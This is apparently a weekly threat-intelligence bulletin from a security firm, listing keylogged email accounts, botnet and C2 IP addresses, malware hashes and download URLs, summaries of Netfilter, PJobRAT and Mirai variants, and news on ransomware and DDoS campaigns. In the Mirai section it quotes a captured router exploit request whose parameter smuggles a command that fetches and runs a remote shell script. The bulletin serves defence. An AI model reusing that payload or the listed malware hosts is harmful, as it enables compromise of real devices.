activity summary - week ending 2 july 2021
TRANSCRIPT
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 1
INTELLIGENCE REPORT: ALL SECTOR CYBER THREATS SER. NO.: IR-21-183-001
Activity Summary - Week Ending 2 July 2021:
• Red Sky Alliance identified 19,270 connections from new unique IP addresses
• Analysts identified 2,543 new IP addresses participating in various Botnets
• 13 unique email accounts compromised with keyloggers were Observed
• Netfilter
• PJobRAT Spyware
• Mirai Knockoffs
• Salvation Army Hit
• Conti & Canada
• DragonForce / Israeli Banking
• Fancy Lazarus attempts an attack on German Banks - Denied
COMPROMISED EMAIL ACCOUNTS
Below are the Top 10 Keylogger emails and the Top Attacker Servers (C2) observed on 2 July 2021 through our
Red Sky Alliance proprietary collection and analysis data. On 28 June 2021, Red Sky Alliance observed 13
unique email accounts compromised with keyloggers which were used to log into mostly personal accounts.
Keylogger: Email Times Seen Attacker Server (C2) Times Seen
[email protected] 12 [email protected] 60
[email protected] 12 [email protected] 52
[email protected] 12 [email protected] 45
[email protected] 12 [email protected] 8
[email protected] 7 [email protected] 6
Table 1: The top two keylogged emails are: [email protected] This is a Russian account possibly spoofing vad-vmd-05m of
Continental Hydraulics in Minnesota US. This name is associated with several social media accounts. Regardless, it is keylogged
and should be avoided. [email protected] Luci Baron is a young person who may have been keylogged. This is a Gmail
account. These and all this week’s keylogged email should be black listed. Call us for a full list.
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 2
Table 2: Top observed Attacker Server (C2), is being used by attackers to maintain communications with compromised systems
within a target network. [email protected] and [email protected] have been compromised for many months.
This attack server should be blacklisted. Contact Red Sky Alliance for more C2 indicators.
COMPROMISED (C2) IP’S
MALWARE ACTIVITY
On 28 June 2021, Red Sky Alliance identified 19,270 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.
On 28 June 2021, analysts identified 2,543 new IP addresses participating in various botnets (call for full .csv
Blacklists, below are only a small sampling of botnet trackers)
IP Contacts
135.181.213.169 65
185.158.115.77 24
129.213.62.230 15
54.39.29.64 14
191.101.217.20 13
147.147.220.127 12
147.147.220.9 11
95.25.211.239 10
62.210.205.65 10
18.189.7.149 10
Malware Variant Times Seen
sality 17082
corkow 1168
sykipot 243
loki 221
shiz 201
koobface 148
wcry_ransom 123
maudi 102
poweliks 89
betabot 84
135.181.213.169 – Hetzner Online Gmbh, address:
Industriestrasse 25, D-91710, Gunzenhausen Germany, ASN:
AS24940, CIDR: 135.181.0.0/16; 185.158.115.77 -- Vnukovo
Ip Server Llc, address: st. Shabolovka, 34, building 3
115419 Moscow Russia, ASN: AS44812, CIDR:
185.158.115.0/24
Top 10 Malware Variant and number of contacts.
Sality and Corkow has consistently remain the top
variants, followed by Sykipot malware.
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 3
Recorded Future Top 5 Threat Actors and Malware for 06 30 2021 (rankings change daily)
First_ Seen Botnet Attribution Infected Host’s IPv4 Address
2021-06-24T21:02:34 SOCKS4 proxy|port:4145 1.0.243.175
2021-06-22T10:51:48 SOCKS4 proxy|port:4145 1.1.155.193
2021-06-22T06:13:12 SOCKS4 proxy|port:4145 1.1.223.117
2021-06-20T07:53:03 HTTP proxy|port:8080 1.2.189.45
2021-06-23T13:01:07 SOCKS4 proxy|port:4145 1.4.169.139
2021-06-26T10:10:58 SOCKS4 proxy|port:5678 1.10.189.108
2021-06-22T06:51:49 HTTP proxy|port:8080 1.20.191.168
2021-06-22T13:12:29 SOCKS4 proxy|port:4145 1.160.26.99
2021-06-22T03:33:10 SOCKS4 proxy|port:4145 1.160.34.69
2021-06-22T23:11:30 SOCKS4 proxy|port:4145 1.160.39.204
2021-06-24T21:02:34 SOCKS4 proxy|port:4145 1.0.243.175
Blacklist data is crucial in proactive network security as they allow companies to defend from network attacks
before they are targeted, giving them the opportunity to prevent attacks - versus reacting to an internal attack.
Our blacklists provide cyber professionals insight into trending attacks and helps identify sources of malicious
emails, malicious websites, and other sources for malware infection. Please contact Red Sky Alliance for full
.csv blacklist data subscription.
This past week, there has been continued cyber-attacks seen throughout the World. The results of a malicious
attack can put you out of business – prepare today.
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 4
MALICIOUS CYBER TRENDS 1
Netfilter—Rootkit Signed With a Valid Digital Certificate – FortiGuard Labs is aware of reports of a recently discovered rootkit named Netfilter. Netfilter, discovered by security researcher Karsten Hahn, utilizes signed certificates to evade detection. Signed malware containing valid digital certificates are often used by threat actors to evade detection as they are trusted by antivirus and other endpoint security software. Because a company/organization is vetted by a certificate authority (CA) before the issuance of a digital certificate, operating systems and antivirus software treat files signed with these certificates as clean, which ultimately allows the file(s) to operate with impunity. What makes this latest discovery unique is that the signed certificates are valid Microsoft signed signatures. Details are not available at this time as to how these certificates belonging to Microsoft were used to sign the malware. Fortinet customers currently running the latest definition sets are protected against known Netfilter samples. Find more details in out technical FAQ here.
Signatures: W64/Agent.AOD!tr W64/MalDrv.AOD!tr W32/Agent.ADFG!tr W64/Agent.L!tr W32/Agent!tr W32/PossibleThreat W32/UPXHack.A PossibleThreat.FAI
Indicator(s):
• 63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0
• d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe
• 4a229ab274e364df92cc46ecbc9faab32f7b0955dab982658313f2faf9410863
• a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac4
• bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a
• bff9b75ae2eea49a765f79d9c67c997edb6c67a2cc720c6187dd2f67980acab7
• f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca
Web Filtering - Indian Military Personnel being targeted using PJobRAT Spyware – Researchers discovered an ongoing attack that is being conducted relating to the Indian military. The malware is named PJobRAT. The malware structure is based on Android. The first attack using this malware was in January 2021 though the RAT family is speculated to have first appeared in December 2019. The attacker only focuses on Indian personnel who have a military background. The malware "PJobRAT" is masked as the current version of the Marriage and Indian Dating application, Trendbanter. After some analysis of the malware, it was found that the malware only uploads specific suffixes in mobile phones, which includes the PDF, PPT, DOC, XLS, DOCX, PPTX, and XLSX type of files. Through the auxiliary function of Android, the malware will be able to retrieve personal information on conversation messages from WhatsApp.
The features of this malware include:
• Recording • Upload SMS • Upload address book • Upload image file • Upload audio files • Upload a list of external storage files • Update phone number
1 Fortinet Intel Blog, 06 25 2021
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 5
• Upload video file • Upload a list of installed apps • Upload Wi-Fi, geographic location, and other information
The malware is using only two types of communication: Firebase Cloud Messaging (FCM) and HTTP. So, once it runs on a mobile phone, it begins the execution process. The malware starts to execute the activities mentioned above. It will gather all the information from the victim and send it to the attacker through the command-and-control server. The data pushes via the FCM message push function. FortiGuard Labs has classified all related IOCs.
Indicator(s):
• 144[.]91[.]65[.]101/senewteam2136/mainfiles/file_handler[.]php • 144[.]91[.]65[.]101/senewteam2137/mainfiles/file_handler[.]php • 144[.]91[.]65[.]101 • helloworld[.]bounceme[.]net/axbxcxdx123/test[.]php • helloworld[.]bounceme[.]net
Mirai Knockoffs / Fortinet Research Blog – Five years have passed since the source code of MIRAI IoT malware was released to the public (2016). This led to numerous copycats, creating their own tactics of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same. IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. These hackers seek to exploit known—and sometimes even zero-day—vulnerabilities to increase their chances of gaining access. And once they do, malicious binaries are downloaded and executed that make the device part of a zombie network that could then be instructed to participate in a Distributed Denial-of-Service (DDoS) attack that could cause a service outage to an unfortunate target. Some threat actors even sell these new botnets as a service. Researchers have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT device with the help of a honeypot system.
So, where are these attacks come from? To simulate what it would be like for a new IoT device to be connected to the Internet for the first time, Fortinet set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute force attacks. The statistics in this article were taken from a three-week period. On average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. The identify of nearly 4000 of those attacks and connect them to a Mirai-related malware Figure 1. Unique telenet source IPs per country
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 6
family was teen. Since this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table. Top IoT Malware Variants - Mirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands were successfully executed in the device—although this could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.
The figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device. These strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.
Based on the attacks received by the honeypot, the following table shows the top
10 variants we were able to identify. The Enigmatic “Hajime - Hajime was titled as the successor to the first generation of Mirai. Built on the same principle and goals as of its predecessor, it tries to propagate to IOT devices by means of brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown. Aside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instruct bots to download and execute binaries, internally called "modules". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Additionally, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.
And it delivers the following message to the device’s terminal: “Just a white hat, securing some systems. Important messages will be signed like this! Hajime Author. Contact CLOSED Stay sharp!”
Figure 3. Sample shell commands executed by a SORA bot
Figure 2. Top ten identified variants
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 7
It was only a matter of time before some speculated that Hajime might be the work of a real vigilante.
SYLVEON Coming Out of Retirement? What surprised Fortinet was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year old European IoT malware author that went by the name of “Light The Sylveon” and “Light The Leafeon”. Researchers took quick look at the decrypted strings of one of the binaries we captured, the word “Leafeon” was found, creating speculation that this might be the author’s comeback.
“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands–very similar to BrickerBot. From the malware authors’ perspective, based on a message embedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.” Eventually, the “Light The Sylveon” author announced through a post on his twitter account that he was going to abandon the project. Unlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly
based on the Mirai source code with some added attacks. Interestingly enough, the group greek.Helios and a certain Thar3seller, which were a group previously associated with other IoT malware campaigns, currently claim to be the authors of this variant. The relationship between these different authors is still unclear. What we are certain about is that this variant is being actively operated, as also shown by recently updated binaries found in one of its download servers.
Figure 4. Function name list found
in a SYLVEON binary.
Figure 5. Open directory hosting SYLVEON variant
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 8
SORA - The Surviving Member of the Wicked Family. It is interesting to see Mirai variants that were authored by the threat actor known as Wicked that we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observations, it seems that SORA has more successfully survived than its siblings.
Mirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities - Aside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list.
A few weeks ago, it added several more exploits, two of which are recent:
OptiLink ONT1GEW GPON Remote Code Execution (formTracert function)
CVE-2021-1498 (Cisco HyperFlex HX Remote Code Execution)
Figure 6. Strings found in a SYLVEON binary
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 9
CVE-2021-31755 (Tenda Router AC11 Remote Code Execution)
(Unidentified target)
Figure 7. Sample request
Here is a list of other vulnerabilities this malware variant tries to exploit:
Vulnerability Description
CVE-2021-22986 F5 iControl REST Remote Code Execution
CVE-2009-4490 mini_httpd 1.18 Escape Sequence
CVE-2018-10088 XiongMai uc-httpd Buffer Overflow
CVE-2020-28188 TerraMaster TOS Remote Code Execution
CVE-2020-29557 D-Link DIR-825 Buffer Overflow
CVE-2020-25506 D-Link DNS-320 Remote Code Execution
CVE-2021-22502 Micro Focus OBR Remote Code Execution
CVE-2021-27561/CVE-2021-27562 Yealink DM (Device Management) Remote Code Execution
CVE-2021-22991 F5 BIG-IP Buffer Overflow
VisualDoor(2021-01-29) SonicWall SSL-VPN Remote Code Execution
Unknown 2 key parameter on /cgi-bin/login.cgi leading to Remote Code Execution Sample request: POST /cgi-bin/login.cgi HTTP/1.1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 key=';`cd /tmp; wget http://{REDACTED IP}/lolol.sh; curl -O http://{REDACTED IP}/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;`;#
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 10
Analyst conclusion - As the number of installed IoT devices continues to explode, especially given the current lack of security standards available to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this article. And interestingly, Mirai variants are still very active in terms of attack and development.
IOCs: MANGA
Files (SHA256) 25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd 5312cb57d8c38ab349a9d67db65c66a733758cb29eb118c958ede11a98322c8a 6075c917e2b25ff2def7cdb3019e0ad725a02387c9e1e83cb6514bd410c8f928 fd2aed69644ff8edcc501945ca5e83d548c6c346d3e92c922eeb3f5da03f9b8d 626e1a247045dff09c4b6aa5de8d9b9d1d385846306a359587f42b60d4413258 68601bae31381d2205dd16df1f2aff52592f9a9aad71ea5f60f68321c6aea579 40066f30b72b4184b33e834712832879f8814ddaf56c71f33bbaacb890c350f0 51ffd3c3e1b10b629692b3b1120c777388ae73c61469bb2926d2a70a457ea14d fee1a5ceea21f14b60f0d632a2889bf3ef81f45eb783e53ada44b9b2f8e4a4a 7df6c4d3bc4f528c5928e3ef09feb532e3407f893af02c16437e669390d6a09f eb64753c578138157eeff8ba1087a94538f1337bd4c6d09ac26806cb12ff69c1 ef57d97bffb2ef7a435fe6668d0aba12196cd91ee1cd3d5446ad525995b76b8d c9845823a32b9b5ff59f76771c90e4f23c8f94e9013051797cfd4efdf43c4d4f 1a2bc7e97c73efbbbe4a7ad0f577c2b3585f1fe15a3fdb82bd79f13906d838d0 ca9965127cfdae9e2d8b228af0ab691589ac27cc5ca17a3377de2e8551b64f9f 49e5ba121c216146cdcf63ebade1853a3710fa266f8c456e3dcee0565e6bdbb1 1bb9bda36b1d2a8963e5a2687ce4645a02805ad0ccb74a0b234cdb9503fdd8e3 f19c64746eddcd33daa30df9c9f282863ad05b22e2f143382f0ab18547cd6497 ec7f7a791e7bca70b5143bbe9064124ae05cdfc13a3c7ab295b6f555eda1ed7d
Download URLs
• http[:]//212.192.241.72/bins/dark.mpsl
• http[:]//212.192.241.72/bins/dark.arm5
• http[:]//212.192.241.72/bins/dark.arm6
• http[:]//212.192.241.72/bins/dark.arm7
• http[:]//212.192.241.72/bins/dark.x86
• http[:]//212.192.241.72/bins/dark.ppc
• http[:]//212.192.241.72/bins/dark.mips
Hajime
Files (SHA256) a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Download URLs http[:]//121.121.122.176:29641/.i http[:]//121.162.45.6:38828/.i http[:]//125.227.193.220:38674/.i http[:]//130.164.183.217:62624/.i http[:]//14.42.160.123:19634/.i http[:]//147.234.71.142:7011/.i http[:]//171.232.247.121:63812/.i http[:]//171.247.233.69:36829/.i http[:]//175.115.103.118:8450/.i http[:]//178.116.76.54:20060/.i http[:]//183.108.201.171:32745/.i http[:]//184.82.56.195:58027/.i http[:]//187.233.194.166:3181/.i http[:]//187.37.198.126:14552/.i
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 11
http[:]//189.132.235.210:43064/.i http[:]//189.173.97.200:41775/.i http[:]//190.18.221.214:51789/.i http[:]//2.45.4.24:50436/.i http[:]//201.105.177.84:25768/.i http[:]//210.99.125.95:56779/.i http[:]//211.107.151.26:26593/.i
Sample commands after gaining access:
SYLVEON
Files (SHA256) 2bdd553ad6485d11844c6cb68ae63f083c7f2ee6029f128a1521427e9a29aad5 311ac01e395d96f8017ef95dfa9ee8f00aa527e02cfcd207de371e04e5aed023 4a4b8fdbe2cff3547e6d808226d34cf6059d9160326326d3b90d851e602035d8 7edb2ff320e99a1b92c7fa51dcd485edbc15eb4d23520ee26ed0d42600a733a1 4bbf2dab9cce066bab887e0058150157f0417d6dceca64025ce2127a8eb584b0 208ae3086c769098f1a55ac6d88fb760571010c16f4a0e25c98ee0d33d4bdbbc fac943c6173cf183e53bea76d4f6b07dbb455ec3dc98dda71164267fc7e1dbb4
Download URL:
• http[:]//31.210.20.138/uwu/arm6
• http[:]//31.210.20.138/uwu/ppc
• http[:]//31.210.20.138/arm6
• http[:]//31.210.20.138/sh4
• http[:]//45.153.203.219/uwu/arm6
• http[:]//45.95.169.110/bins/m68k
Sample commands after gaining access:
GLOBAL TRENDS:
UK / Salvation Army (Charity) - The Salvation Army (SA) in England has been hit by a ransomware attack. It is
reported the Christian charity organization is negotiating with the attackers over the stolen data. UK media is
reporting the Salvation Army first noticed the attack around a month ago, which is believed to have affected a
London data center used by the charity.2 A Salvation Army spokesperson confirmed the attack took place and
that the UK’s Information Commissioners Office (ICO) has been informed, “We are investigating an IT incident
affecting a number of our corporate IT systems. We have informed the Charity Commission and the ICO, are
2 https://www.infosecurity-magazine.com/news/salvation-army-ransomware-attack/
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 12
also in dialogue with our key partners and staff and are working to notify any other
relevant third parties.” The SA said that none of its services for vulnerable people
had been affected. As of 1 July, there is no further information about the cyber-
attack, such as the attackers' identity or the data accessed. As of this same date,
no data has appeared on any known ransomware gang sites. The Salvation Army
staff and volunteers have been advised by authorities to keep a close watch for
any unusual banking activity from their accounts or suspicious communication
they receive. This cyber-attack has further demonstrated that no organization is
safe when it comes to ransomware and must be prepared to face attacks at any
time. A systems engineering manager at Infoblox said, “This latest attack on the
UK arm of the Salvation Army shows that ransomware is growing in sophistication and that actors are getting
bolder. No organization is off-limits, even those in the charity sector. When it comes to ransomware, the only
truly effective approach is prevention. If an unprotected system gets attacked, there is no way to guarantee the
retrieval or decryption of data. Mitigating risk before an attack can happen is the most effective defense an
organization can have. Security solutions – such as those that leverage DNS – that can interrupt the malware's
attempt to connect to the command-and-control server, as well as frequent and robust backups, are key. All
organizations - regardless of size or sector - should expect ransomware attacks and prepare accordingly.”
The CEO at CybSafe, added, “Sadly, this latest incident is just one of a spate of ransomware attacks to have
occurred over recent months. Schools, healthcare services and charities such as the Salvation Army are being
increasingly targeted by malicious actors who view them as soft targets. Given the growing frequency of these
attacks, it’s never been more important for organizations and individuals to take the necessary measures to protect
themselves online. We need to move beyond basic awareness training and more seriously consider the human
aspect of cybersecurity. As these attacks become more sophisticated, they also become more personalized, and
therefore an approach towards cybersecurity must mirror this if organizations and individuals are to successfully
fend off such threats.”
Conti & Canada - Three more Canadian companies have been listed on a ransomware group’s website as being
victims of their attacks. The firms are an internet provider in southwestern Ontario, a engineering firm in eastern
Ontario and an insurance broker in Quebec. The Conti ransomware group says it has stolen data from all three,
and as proof posted copies of what it says are some of the files. The Conti group has a reputation of not bluffing.
The three are either small or medium sized-firms, more evidence that ransomware gangs and their affiliate
partners, who actually do the targeting, are not just after big
companies.3 There were lots of headlines earlier this year
when the US, Canada and other countries blamed a Russian-
based threat group for being behind the compromise of the
SolarWinds Orion network management platform. Despite all
the attention the group is still active, according to Microsoft.
The company said Friday that the group, which it calls
Nobelium, has recently been trying to break into targeted
organizations in Canada, the US, Germany and other
countries. Although most attempts were unsuccessful,
Microsoft admitted that the computer of one of its customer support staff was hacked. Stolen customer information
3 https://www.itworldcanada.com/article/cyber-security-today-june-28-2021-more-canadian-firms-hit-with-ransomware-nobelium-
group-attempting-to-infiltrate-canadian-and-u-s-firms-dreamhost-data-fumble-and-more/455193
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 13
from that hack was used by Nobelium to try to get into their organizations. Nobelium mainly targets IT-related
companies and governments but has also been seen going after think tanks and financial services firms. In
addition to using stolen information to try to get into organizations, Nobelium uses password spray and brute-force
password attacks.
DragonForce / Israeli Banking - The Israeli banking system was attacked last weekend by hundreds of
Malaysian hackers in an attempt to damage the state’s financial apparatus. The anti-Israel group of hackers
called “DragonForce” who carried out the attack claimed they had damaged the entire system; the hackers posted
screenshots that appeared to show the collapse of the computers on Israeli banking sites. However, it is estimated
that in many cases, these were fake pics. The attack was carried out in three waves, was aimed at harming the
services from the banks’ websites, and “even to try and film them through a distributed denial of service (DDoS)
attack.” The final wave of attacks, launched in the late hours of 25 June was the most intense and difficult of them
all, according to the Hebrew-language Ynet site. “This is an urgent call for all hackers around the world to unite
again and start a campaign against Israel,” the group’s Telegram group said. Hundreds of thousands of members
joined via Twitter, Telegram, Facebook and a forum.
Against the background of Israel’s activities in Gaza, the group launched the current attack a few days before its
planned date, distributing the Internet addresses of Israeli banks and inviting hackers who hated Israel from all
over the world to participate in the attack. In Israel, cyber defense personnel prepared for the attack and reportedly
prevented most of the attempts. A source at one of the banks told Ynet that when the bank’s cyber defense
personnel managed to block the Internet addresses of the attackers, they saw a message on the screen as if the
bank’s website had crashed. “Some of the time they posted all kinds of ‘successes’ [but] it was a ‘Photoshop'”
the source said. During a DDoS attack, the attackers launch
thousands of calls simultaneously with the aim of causing the targeted
site to crash. According to estimates by experts who participated in
the defense of the banks, the scope of the attack reached
approximately 200 megabytes per second which is a considerable
volume. The purpose of this type of attack is to exploit the high
number of attackers to collapse the computer systems, rather than to
infiltrate to obtain information. A source in the Israeli banking system
said the targeted load of inquiries led to a brief slowdown and denial
of service at all banks’ sites.
One of the attacks was aimed at the Bank of Israel. “From time to time attempts are made to carry out DDoS
attacks on the Bank of Israel’s external website and on websites of government ministries,” the Bank of Israel said
in a statement. “Such attempts are routinely blocked without damage to the website; thus in any case such
attempts do not affect the bank’s systems.” Other banks issued similar statements, saying the attempted attack
was “unsuccessful and no damage to any service or process was identified.”
DragonForce recently published one file that allegedly contained the names and addresses of hundreds of
thousands of Israeli students and another that contained a list of Israelis’ passports as well as other personal data.
In this case, however, experts in Israel’s cyber defense system said such attempts as those on the banks’ websites
are “routinely recognized and stopped. In this case too, the banks were prepared and all attempts were stopped
without harming the service or any process.”
Germany / Banking Attack - German authorities allegedly stopped a cyberattack on a data service provider used
by federal agencies and pushed back on a report that a broad assault targeted critical infrastructure and banks.
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 14
The attempted attack was quickly handled and the impact on service was “very marginal,” Interior Ministry
spokesman told reporters on 30 June. He added that it was likely criminally motivated. German media cited
unidentified intelligence sources saying that a hacker group linked to the Kremlin had carried out an attack on
German infrastructure and the country’s banking system. The group was identified as “Fancy Lazarus” after
earlier referencing “Fancy Bear,” a group controlled by Russia’s GRU military intelligence agency. German
officials have not detected an increase in cyber activities in recent days. Germany’s BSI Federal Cyber Security
Authority denied Twitter reports and said that the agency had no knowledge of the attack, which media sources
said may be revenge for international sanctions leveled on Russia and Belarus.
Proofpoint Inc., a cybersecurity firm said this month in its blog that Fancy Lazarus previously identified themselves
as Fancy Bear and has been involved in an increasing number of so-called distributed denial-of-service attacks,
including against the energy, financial and insurance industries. Such attacks attempt to overload systems by
flooding the target with superfluous requests from multiple sources. Proofpoint said there was no known
connection to the Fancy Bear group that has been labeled an advanced, persistent threat.
A spokesperson for Deutsche Bank AG and Commerzbank AG and for
lobby groups for savings, cooperative and private lenders said they
were looking into the attempted cyber-attack. With elections looming
in September and Chancellor Angela Merkel poised to step aside,
German authorities are on the alert for the potential for interference
from Russia, both in terms of cyberattacks on infrastructure as well as
disinformation campaigns. The Green party’s chancellor candidate, Annalena Baerbock, has become a target
given her strong opposition to the almost-completed Nord Stream 2 pipeline that would channel gas from Russia
to Germany.
CYBER THREAT ANALYSIS CENTER (CTAC) 1 July 2021
Dark Web Collection/Analysis
Bank of Israel – Hits: 183
The Bank of Israel is the central bank of Israel. The bank's headquarters is in
the Kiryat HaMemshala section of Jerusalem, with a branch office in Tel Aviv.
The primary objective of the Bank of Israel is to maintain price stability and
the stability of the financial system in Israel.
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved. 15
Activist Corner 4 5 6
4 The Overton window is the range of policies politically acceptable to the mainstream population at a given time. 5https://www.democracynow.org/2021/6/29/headlines/an_overt_political_blockade_minnesota_police_barricade_line_3_pipeline_
protest_camp 6 https://patch.com/massachusetts/waltham/pipeline-protesters-stage-sit-enbridge-office-waltham
Two members of the US Congress are seen yuking it up with a
Sunrise Movement (SM) youth reporter in the halls of Congress.
This podcast is to further promote the Green New Deal, Civilian
Climate Corps (CCC) and its unionization of the proposed
workforce. These titles are a knock off of the New Deal and CCC
of the US Depression era (1930’s) programs under President F.
Roosevelt. Sunrise Movement is a US political action youth
organization that advocates political action on climate change.
After political actions, they turned their focus on working towards
shifting the Overton window on climate policy to center the
environmental program known as the Green New Deal. Together
with Justice Democrats and Alexandria Ocasio-Cortez, the group is
now highly organized activist group.
Last Monday, MN sheriff’s deputies barricaded access to an
encampment of environmental activists who are resisting
construction of the Enbridge Line 3 tar sands pipeline, which has
the backing of the Biden administration. Officers towed several of
the activists’ cars and made several arrests throughout the day. An
attorney for the Indigenous-led protesters called the move, “nothing
less than an overt political blockade.” Over in Waltham MA,
protesters opposing a compressor and pipeline project are staging
a sit in at the Waltham offices of Enbridge. Hmmmm. Coincidence?
The protesters oppose the company's Weymouth compressor and
Line 3 Pipeline projects, according to a tweet from an environmental
reporter. Police arrived around noon to get the protesters out of the
building for trespassing, according to the tweet. Last week marked
the end of a global week of action against insurers of Canada’s
Trans Mountain pipeline and its expansion project. The protests,
calling on its insurers to cut ties with the federally owned pipeline,
spanned 25 actions across four continents. Another coincidence?
Last Sunday, London Police arrested 23 members of the activist
group Extinction Rebellion during a “Free the Press” day of protest
against media corruption in the United Kingdom. The highlight of
the Sunday action was when protesters dumped seven tons of
horse manure at the doorsteps of the British tabloid Daily Mail and
defaced its entrance with spray paint. Protesters sent a message
to four billionaires who they say control 68% of the UK’s print media
to “cut the buillsh*t!” and demanding “an end to media corruption
that suppresses the truth from the public for profit.”